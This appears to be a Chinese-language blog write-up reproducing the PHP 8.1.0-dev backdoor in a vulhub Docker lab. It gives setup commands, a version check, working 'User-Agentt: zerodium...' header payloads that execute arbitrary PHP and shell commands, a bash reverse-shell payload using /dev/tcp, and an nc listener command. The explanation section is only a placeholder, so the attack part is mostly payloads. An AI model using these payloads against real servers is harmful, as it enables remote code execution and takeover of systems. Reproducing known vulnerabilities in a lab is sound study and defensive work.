Post

漏洞复现-PHP 8.1.0-dev

PHP 8.1.0-dev开发版本后门事件

构建

1
2
cd vulhub/php/8.1-backdoor
docker-compose up -d 

漏洞原理

toadd

PoC(Proof of Concept) 验证漏洞存在的代码

版本验证:PHP 8.1.0-dev 请求站点,response返回版本信息

1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 28 Aug 2024 12:51:06 GMT
Host: 127.0.0.1:8081
X-Powered-By: PHP/8.1.0-dev  #

hello world

Exp(Exploit)进行实际的攻击利用

添加特定字段User-Agentt payload 漏洞利用载荷:

1
2
User-Agentt: zerodiumvar_dump(233*233); #将返回执行结果 int(54289)
User-Agentt: zerodiumsystem("ls");

执行截图:

image-20240828155056972

成功执行代码ls

建立反弹shell(成功):

靶机构造payload:

1
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/127.0.0.1/8999 0>&1'");

接收反弹Shell机器执行:nc -lvvp 8999

注意: 接收反弹Shell机器 监听端口防火墙要放行,任意ip能访问,安装nc 靶机 能够执行bash命令,且访问到监听机

复现总结

###

This post is licensed under CC BY 4.0 by the author.